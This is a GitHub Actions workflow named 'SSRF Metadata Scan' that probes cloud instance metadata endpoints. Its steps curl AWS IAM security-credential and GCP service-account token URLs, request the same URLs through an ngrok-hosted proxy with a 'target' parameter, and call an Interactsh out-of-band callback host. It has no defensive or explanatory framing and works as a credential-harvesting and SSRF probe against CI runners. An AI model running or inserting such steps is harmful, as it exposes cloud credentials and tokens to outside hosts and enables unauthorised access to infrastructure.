name: GitHub SSRF Metadata Scan

on:
  workflow_dispatch:

jobs:
  ssrf-metadata:
    runs-on: ubuntu-latest
    steps:
      - name: Curl AWS Metadata
        run: |
          curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ || true

      - name: Curl GCP Metadata
        run: |
          curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token || true

      - name: Curl Flask Proxy
        run: |
          curl "https://cd13e3febd7f.ngrok-free.app/proxy?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/" || true
          curl "https://cd13e3febd7f.ngrok-free.app/proxy?target=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" || true

      - name: Curl Interactsh
        run: |
          curl https://d2asa4q9io6mnisgcqu0ug597nzdp3bnt.oast.live || true
